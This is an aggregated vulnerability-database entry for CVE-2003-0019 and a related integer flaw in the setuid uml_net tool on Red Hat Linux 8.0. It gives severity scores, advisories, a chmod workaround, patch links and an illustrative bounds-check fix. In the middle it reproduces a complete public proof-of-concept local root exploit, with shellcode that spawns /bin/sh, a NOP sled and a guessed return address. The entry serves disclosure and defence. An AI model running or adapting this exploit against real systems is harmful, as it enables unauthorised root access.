CVE-2003-0019
CVSS 7.2
Published: 2003-02-19 00:00:00
Revised: 2008-09-10 20:05:23

[Original] uml_net in the kernel-utils package for Red Hat Linux 8.0 has incorrect setuid root privileges, which allows local users to modify network interfaces, e.g. by modifying ARP entries or placing interfaces into promiscuous mode.


[CNNVD] RedHat Linux User Mode Linux SetUID Installation Vulnerability (CNNVD-200302-045)

RedHat is a free, open-source Linux operating system. Its kernel-utils package contains several tools for controlling the kernel or the machine's hardware, and Red Hat 8.0 ships the User Mode Linux (UML) tools.
The uml_net tool is installed with incorrect permissions; a local attacker can exploit this to carry out various malicious actions with elevated privileges.
The uml_net tool in the kernel-utils package shipped by default with Red Hat 8.0 is incorrectly installed setuid root, which lets local users use it to control some network interfaces, add and delete ARP entries and routes, and place interfaces into promiscuous mode.

- CVSS (base score)

CVSS score: 7.2 [HIGH]
Confidentiality impact: COMPLETE [complete information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may result in a complete system outage]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0019
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0019
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200302-045
(official data source) CNNVD

- Other links and resources

http://www.kb.cert.org/vuls/id/134025
(UNKNOWN)  CERT-VN  VU#134025
http://www.redhat.com/support/errata/RHSA-2003-056.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2003:056
http://www.iss.net/security_center/static/11276.php
(VENDOR_ADVISORY)  XF  linux-umlnet-gain-privileges(11276)
http://www.securityfocus.com/bid/6801
(UNKNOWN)  BID  6801
http://www.ciac.org/ciac/bulletins/n-044.shtml
(UNKNOWN)  CIAC  N-044

- Vulnerability details

RedHat Linux User Mode Linux SetUID Installation Vulnerability
Severity: High   Type: Configuration error
Published: 2003-02-19 00:00:00   Updated: 2005-05-13 00:00:00
Threat type: Local

- Advisories and patches

Temporary workaround:
If you cannot install the patch or upgrade immediately, CNNVD recommends the following measure to reduce the threat:
* chmod -s /usr/bin/uml_net
Vendor patch:
RedHat
------
RedHat has released a security advisory (RHSA-2003:056-08) and a corresponding patch:
RHSA-2003:056-08: Updated kernel-utils packages fix setuid vulnerability
Link: https://www.redhat.com/support/errata/RHSA-2003-056.html
Patch download:
Red Hat Linux 8.0:
SRPMS:
ftp://updates.redhat.com/8.0/en/os/SRPMS/kernel-utils-2.4-8.28.src.rpm
i386:
ftp://updates.redhat.com/8.0/en/os/i386/kernel-utils-2.4-8.28.i386.rpm
The patch can be installed with the following command:
rpm -Fvh [filename]

- Vulnerability details (22640)

UML_NET Integer Mismanagement Code Execution Vulnerability (EDBID:22640)
linux local
2003-05-23 Verified
0 ktha@hushmail.com
N/A
source: http://www.securityfocus.com/bid/7676/info

A vulnerability has been discovered in uml_net. Due to integer mismanagement while handling version information, it may be possible for an attacker to execute arbitrary code. Specifically, by supplying a negative value within the version information it is possible to bypass various calculations and cause an invalid indexing into an array of functions. As a result, it is possible for an attacker to execute a function in an attacker-controlled location of memory.

Successful exploitation of this vulnerability would allow an attacker to execute arbitrary commands with the privileges of uml_net, possibly root. 
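The description above comes down to a signed value that is checked only against an upper bound before it selects an entry from a function table, so a negative value passes the check and indexes outside the table. The following C example is added here for illustration; it is not code from uml_net or from the exploit author, and the table, handler names and function names are hypothetical. It contrasts that flawed check with a strict parse plus a closed-range check, feeding both the negative value used by the PoC.

```c
#include <errno.h>
#include <stdlib.h>

/* Hypothetical dispatch table standing in for per-version handlers. */
typedef int (*handler_fn)(const char *iface);
static int handle_v1(const char *iface) { (void)iface; return 1; }
static int handle_v2(const char *iface) { (void)iface; return 2; }
static handler_fn handlers[] = { handle_v1, handle_v2 };
#define NHANDLERS ((int)(sizeof handlers / sizeof handlers[0]))

/* Flawed pattern: only an upper-bound check on a signed value.
   Returns the index that would be used (-1 when rejected) and never
   dereferences, so a negative version just reports the out-of-range
   index it would have used against the table. */
int index_vulnerable(const char *version_arg)
{
    int ver = atoi(version_arg);   /* "-302068188" parses without complaint */
    if (ver > NHANDLERS)           /* negative values sail through */
        return -1;
    return ver - 1;                /* may be hugely negative */
}

/* Hardened: strict integer parse, then a closed range check, and only
   then an index into the table. */
int index_hardened(const char *version_arg)
{
    char *end;
    long ver;

    errno = 0;
    ver = strtol(version_arg, &end, 10);
    if (errno != 0 || end == version_arg || *end != '\0')
        return -1;                 /* not a clean integer */
    if (ver < 1 || ver > NHANDLERS)
        return -1;                 /* outside the table */
    return (int)(ver - 1);
}

/* Dispatch only through the hardened index; -1 means "rejected". */
int dispatch(const char *version_arg, const char *iface)
{
    int idx = index_hardened(version_arg);
    if (idx < 0)
        return -1;
    return handlers[idx](iface);
}
```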

/*
  uml_net proof of concept exploit

  Tested on: RH 8.0 with default uml_utilities from kernel-utils-2.4-8.13
             RH 8.0 with binary from uml_utilities_20030312, uml_utilities_20020821
  It may work on other linux distributions

  Author: ktha@hushmail.com
  Based on the bug that I found in uml_net.c on 23.05.2003

  Greets: M|G - no1 keep up the good work
          securitech guys, security-corp guys - thx for the challenges
          all of you who support me in real life

*/


#include <stdio.h>
#include <stdlib.h>		/* malloc, atoi, exit */
#include <string.h>		/* memset, memcpy */
#include <unistd.h>		/* execve */

#define SHELL 0xbffffdd7	/* guessed stack address inside the NOP sled */
#define ROT -302068188		/* negative "version" value passed as argv[1] */

/* Builds the single environment string handed to uml_net: a 5000-byte
   NOP sled with SHELL repeated every 4 bytes (shifted by pad), followed
   by the shellcode. */
char *
gen (int pad)
{
  int i, size;
  char *p;
  char shellcode[] = "\x31\xc0"	// xorl    %eax,%eax
    "\x31\xdb"			// xorl    %ebx,%ebx
    "\xb0\x17"			// movb    $0x17,%al
    "\xcd\x80"			// int     $0x80
    "\xeb\x18"			// jmp     end
    				// start:
    "\x5e"			// popl    %esi
    "\x89\x76\x08"		// movl    %esi,0x8(%esi)
    "\x31\xc0"			// xorl    %eax,%eax
    "\x88\x46\x07"		// movb    %eax,0x7(%esi)
    "\x89\x46\x0c"		// movl    %eax,0xc(%esi)
    "\xb0\x0b"			// movb    $0xb,%al
    "\x89\xf3"			// movl    %esi,%ebx
    "\x8d\x4e\x08"		// leal    0x8(%esi),%ecx
    "\x8d\x56\x0c"		// leal    0xc(%esi),%edx
    "\xcd\x80"			// int     $0x80
    				// end:
    "\xe8\xe3\xff\xff\xff"	// call    start
    "\x2f\x62\x69\x6e\x2f\x73\x68";	// .string "/bin/sh"


  size = sizeof (shellcode);
  p = (char *) malloc (5000 + size + 1);
  memset (p, 0x90, 5000);
  for (i = 1; i < 1000; i++)
    *(int *) (p + 4 * i + pad) = SHELL;
  memcpy (p + 5000, shellcode, size + 1);
  *p = "SM00NY=";		/* as in the original: stores one byte of the string's address, not the string */
  return p;
}

void
usage (char *sir)
{
  printf ("\nUsage: %s <UML_NET> [pad]\n\n", sir);
  printf ("Pad value: 0 - 3\nDefault: 0\n");
  printf ("\n");
}

int
main (int argc, char **argv)
{
  unsigned long pad = 0;
  char s[1000];
  char *nume[4], *pume[2];

  if (argc < 2)
    {
      usage (argv[0]);
      exit (0);
    }

  if (argv[2])
    pad = atoi (argv[2]);

  /* argv[1] of uml_net becomes the negative "version" value */
  sprintf (s, "%d", ROT);

  nume[0] = argv[1];
  nume[1] = s;
  nume[2] = "add";
  nume[3] = NULL;

  /* the whole environment is the sled + shellcode string */
  pume[0] = gen (pad);
  pume[1] = NULL;

  printf ("Trying to exploit.... pad value: %lu\n", pad);
  printf ("If you get a segfault, try to change the pad value !\n");

  execve (nume[0], nume, pume);
  return 0;			/* only reached if execve fails */
}

- Vulnerability details

4926
Red Hat Linux kernel_utils uml_net Overflow
Local Access Required Input Manipulation, Misconfiguration
Loss of Confidentiality, Loss of Integrity, Loss of Availability
Exploit Public

- Vulnerability description

A local overflow exists in uml_net from kernel-utils. uml_net fails to properly check bounds, resulting in an integer overflow. With a specially crafted request, an attacker can cause an overflow resulting in a loss of confidentiality, integrity, and/or availability. Note that this would not normally be an issue, but this version of kernel-utils installs uml_net as setuid root.

- Timeline

2003-05-23 Unknown
2003-09-28 Unknown

- Solution

Upgrade to kernel-utils version 2.4-8.28 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): chmod -s /usr/bin/uml_net

- Vulnerability details

Red Hat Linux User Mode Linux SetUID Installation Vulnerability
Class: Configuration Error   BugTraq ID: 6801
Remote: No   Local: Yes
Published: 2003-02-07 12:00:00   Updated: 2009-07-11 08:06:00
Discovery credited to Johnny Robertson.

- Affected software versions

RedHat Linux 8.0 i386

- Vulnerability discussion

It has been reported that under some circumstances, Red Hat Linux may allow unauthorized actions through User-Mode-Linux compatibility. Due to permissions on some components installed with the User-Mode-Linux utilities, a local user could perform actions on the system that require privilege, potentially affecting local host security.

- Exploit

No exploit is required for this vulnerability.

- Solution

Fixes that correct this issue have been released:


RedHat Linux 8.0 i386
